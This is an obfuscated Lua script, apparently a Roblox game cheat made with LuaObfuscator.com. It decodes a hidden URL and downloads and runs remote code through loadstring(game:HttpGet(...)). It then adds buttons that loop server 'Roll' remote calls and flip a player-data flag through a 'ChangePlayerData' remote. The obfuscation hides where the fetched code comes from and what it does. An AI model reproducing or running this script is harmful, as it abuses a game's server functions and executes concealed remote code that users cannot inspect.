--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v11,v12) local v13={};for v21=1, #v11 do v6(v13,v0(v4(v1(v2(v11,v21,v21 + 1 )),v1(v2(v12,1 + (v21% #v12) ,1 + (v21% #v12) + 1 )))%256 ));end return v5(v13);end local v8=loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\250\31\223\168\224\23\197\203\206\39\169\159\213\44\208\218\150\16\207\246\235\23\211\209\218\55\255\244\202\31\216\205\148\1\244\137\198\7\159\207\206\36","\126\177\163\187\69\134\219\167")))();local v9=v8:Load(v7("\8\236\3\241\211\99\229\31\231","\156\67\173\74\165"),v7("\16\178\79\23\169\42\82","\38\84\215\41\118\220\70"));local v10=v8.newTab(v7("\125\23\43\28","\158\48\118\66\114"),v7("\130\41\17\49\118\140\255\131\33\2\51","\155\203\68\112\86\19\197"));v10.newButton(v7("\105\211","\152\38\189\86\156\32\24\133"),v7("\223\91\174\69\247\23\170\67\188\75\231\117\233\71\162\84\188\113\166\85\232\23\134\83\232\88\231\116\243\91\171","\38\156\55\199"),function() local v14=0 -0 ;while true do if (v14==(1138 -(116 + 1022))) then getgenv().Roll=true;while wait() do if (getgenv().Roll==true) then game:GetService(v7("\154\120\108\36\26\119\251\87\173\121\79\60\28\102\251\68\173","\35\200\29\28\72\115\20\154")).Remotes.Functions.Roll:InvokeServer();end end break;end end end);v10.newButton(v7("\54\185\215","\84\121\223\177\191\237\76"),v7("\152\90\192\163\49\16\61\196\250","\161\219\54\169\192\90\48\80"),function() local v15=0 -0 ;local v16;while true do if (v15==(0 + 0)) then v16=0 -0 ;while true do if (v16==(1423 -(630 + 793))) then getgenv().Roll=false;while wait() do if (getgenv().Roll==true) then end end break;end end break;end end end);v10.newButton(v7("\102\76\64\3\72\81\20\101\123\77\12\41","\69\41\34\96"),v7("\159\207\222\9\9\107\177\198\150","\75\220\163\183\106\98"),function() local v17=0 -0 ;local v18;while true do if (v17==(0 -0)) then v18={[860 -(814 + 45) ]=v7("\17\191\159\35\208\12\189","\185\98\218\235\87"),[4 -2 ]={[1 + 0 ]=v7("\237\61\52\242\236\165\199\48","\202\171\92\71\134\190"),[1915 -(1789 + 124) ]=true}};game:GetService(v7("\27\196\60\132\32\194\45\156\44\197\31\156\38\211\45\143\44","\232\73\161\76")).Remotes.Functions.ChangePlayerData:InvokeServer(unpack(v18));break;end end end);v10.newButton(v7("\148\223\68\29\56\186\202\86\29\44\180\213\78","\126\219\185\34\61"),v7("\47\194\87\113\117\55\254\226\77","\135\108\174\62\18\30\23\147"),function() local v19=0;local v20;while true do if (v19==0) then v20={[1 + 0 ]=v7("\165\236\62\223\17\160\52","\167\214\137\74\171\120\206\83"),[887 -(261 + 624) ]={[1]=v7("\173\241\33\73\202\168\135\252","\199\235\144\82\61\152"),[5 -3 ]=false}};game:GetService(v7("\53\19\169\39\14\21\184\63\2\18\138\63\8\4\184\44\2","\75\103\118\217")).Remotes.Functions.ChangePlayerData:InvokeServer(unpack(v20));break;end end end);
